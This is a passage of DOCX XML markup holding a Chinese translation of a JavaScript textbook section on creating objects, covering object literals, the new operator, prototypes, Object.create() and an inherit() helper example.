        <w:t>可以通过对象直接量、关键字</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>和（</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的）</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来创建对象。接下来几节将对这些技术一一讲述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="6_1_1_Dui_Xiang_Zhi_Jie_Liang_"/>
      <w:r>
        <w:t>6.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　对象直接量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建对象最简单的方式就是在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中使用对象直接量。对象直接量是由若干名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对组成的映射表，名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对中间用冒号分隔，名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对之间用逗号分隔，整个映射表用花括号括起来。属性名可以是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>标识符也可以是字符串直接量（包括空字符串）。属性的值可以是任意类型的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式，表达式的值（可以是原始值也可以是对象值）就是这个属性的值。下面有一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var empty={};//</w:t>
      </w:r>
      <w:r>
        <w:t>没有任何属性的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var point={x:0,y:0};//</w:t>
      </w:r>
      <w:r>
        <w:t>两个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var point2={x:point.x,y:point.y+1};//</w:t>
      </w:r>
      <w:r>
        <w:t>更复杂的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var book={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"main title":"JavaScript",//</w:t>
      </w:r>
      <w:r>
        <w:t>属性名字里有空格</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>必须用字符串表示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>'sub-ti</w:t>
      </w:r>
      <w:r>
        <w:t>tle':"The Definitive Guide",//</w:t>
      </w:r>
      <w:r>
        <w:t>属性名字里有连字符，必须用字符串表示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"for":"all audiences",//"for"</w:t>
      </w:r>
      <w:r>
        <w:t>是保留字，因此必须用引号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>author:{//</w:t>
      </w:r>
      <w:r>
        <w:t>这个属性的值是一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>firstname:"David",//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，这里的属性名都没有引号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>surname:"Flanagan"</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在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>（以及</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>的一些实现）中，保留字可以用做不带引号的属性名。然而对于</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>来说，使用保留字作为属性名必须</w:t>
      </w:r>
      <w:r>
        <w:t>使用引号引起来。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，对象直接量中的最后一个属性后的逗号将忽略，且在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>的大部分实现中也可以忽略这个逗号，但在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中则报错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象直接量是一个表达式，这个表达式的每次运算都创建并初始化一个新的对象。每次计算对象直接量的时候，也都会计算它的每个属性的值。也就是说，如果在一个重复调用的函数中的循环体内使用了对象直接量，它将创建很多新对象，并且每次创建的对象的属性值也有可能不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="6_1_2_Tong_Guo_newChuang_Jian_Dui_Xiang_"/>
      <w:r>
        <w:t>6.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　通过</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>创建对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>运算符创建并初始化一个新对象。关键字</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>后跟随一个函数调用。这里的函数称做构造函数（</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>），构造函数用以初始化一个新创建的对象。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心中的原始类型都包含内置构造函数。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=new Object();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个空对象，和</w:t>
      </w:r>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:t>一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=new Array();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个空数组，和</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var d=new Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个表示当前时间的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var r=new </w:t>
      </w:r>
      <w:r>
        <w:t>RegExp("js");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个可以进行模式匹配的</w:t>
      </w:r>
      <w:r>
        <w:t>EegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了这些内置构造函数，用自定义构造函数来初始化新对象也是非常常见的。第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章将详细讲述其中的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="6_1_3_Yuan_Xing_"/>
      <w:r>
        <w:t>6.1.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　原型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在讲述第三种对象创建技术之前，我们应当首先解释一下原型。每一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象（</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>除外）都和另一个对象相关联。</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>另一个</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对象就是我们熟知的原型，每一个对象都从原型继承属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有通过对象直接量创建的对象都具有同一个原型对象，并可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>获得对原型对象的</w:t>
      </w:r>
      <w:r>
        <w:t>引用。通过关键字</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>和构造函数调用创建的对象的原型就是构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。因此，同使用</w:t>
      </w:r>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:t>创建对象一样，通过</w:t>
      </w:r>
      <w:r>
        <w:t>new Object()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的对象也继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>。同样，通过</w:t>
      </w:r>
      <w:r>
        <w:t>new Array()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的对象的原型就是</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，通过</w:t>
      </w:r>
      <w:r>
        <w:t>new Date()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的对象的原型就是</w:t>
      </w:r>
      <w:r>
        <w:t>Date.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>没有原型的对象为数不多，</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>就是其中之一。它不继承任何属性。其他原型对象都是普通对象，普通对象都具有原型。所有的内置构造</w:t>
      </w:r>
      <w:r>
        <w:t>函数（以及大部分自定义的构造函数）都具有一个继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>的原型。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>Date.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，因此由</w:t>
      </w:r>
      <w:r>
        <w:t>new Date()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性同时继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Date.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>。这一系列链接的原型对象就是所谓的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>原型链</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>prototype chain</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>6.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节讲述属性继承的工作机制。</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节将会讲到如何获取对象的原型。第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章将会更详细地讨论原型和构造函数，包括如何通过编写构造函数</w:t>
      </w:r>
      <w:r>
        <w:t>定义对象的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，以及给构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性赋值可以让其</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>实例</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>直接使用这个原型上的属性和方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="6_1_4_Object_create__"/>
      <w:r>
        <w:t>6.1.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，它创建一个新对象，其中第一个参数是这个对象的原型。</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>提供第二个可选参数，用以对对象的属性进行进一步描述。</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节会详细讲述第二个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个静态函数，而不是提供给某个对象调用的方法。使用它的方法很简单，只须传入所需的原型对</w:t>
      </w:r>
      <w:r>
        <w:t>象即可：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o1=Object.create({x:1,y:2});//o1</w:t>
      </w:r>
      <w:r>
        <w:t>继承了属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可以通过传入参数</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>来创建一个没有原型的新对象，但通过这种方式创建的对象不会继承任何东西，甚至不包括基础方法，比如</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>，也就是说，它将不能和</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符一起正常工作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o2=Object.create(null);//o2</w:t>
      </w:r>
      <w:r>
        <w:t>不继承任何属性和方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想创建一个普通的空对象（比如通过</w:t>
      </w:r>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>new Object()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的对象），需要传入</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> o3=Object.create(Object.prototype);//o3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>new Object()</w:t>
      </w:r>
      <w:r>
        <w:t>一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过任意原型创建新对象（换句话说，可以使任意对象可继承），这是一个强大的特性。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中可以用类似例</w:t>
      </w:r>
      <w:r>
        <w:t>6-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码来模拟原型继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>6-1</w:t>
      </w:r>
      <w:r>
        <w:t>：通过原型继承创建一个新对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>返回了一个继承自原型对象</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>的属性的新对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里使用</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>函数（如果存在的话）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不存在</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>，则退化使用其他方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function inherit(p){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(p==null)throw TypeError();//p</w:t>
      </w:r>
      <w:r>
        <w:t>是一个对象，但不能是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(Object.create)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Object.create(p);//</w:t>
      </w:r>
      <w:r>
        <w:t>直接使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var t=typeof p;//</w:t>
      </w:r>
      <w:r>
        <w:t>否则进行进一步检测</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(t!=="object"</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>t!=="function")throw TypeError();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>functi</w:t>
      </w:r>
      <w:r>
        <w:t>on f(){};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个空构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.prototype=p;//</w:t>
      </w:r>
      <w:r>
        <w:t>将其原型属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new f();//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>的继承对象</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在看完第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章关于构造函数的内容后，例</w:t>
      </w:r>
      <w:r>
        <w:t>6-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>函数会更容易理解。现在只要知道它返回的新对象继承了参数对象的属性就可以了。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>并不能完全代替</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>，它不能通过传入</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>原型来创建对象，而且不能接收可选的第二个参数。不过我们仍会在本章和第</w:t>
      </w:r>
      <w:r>
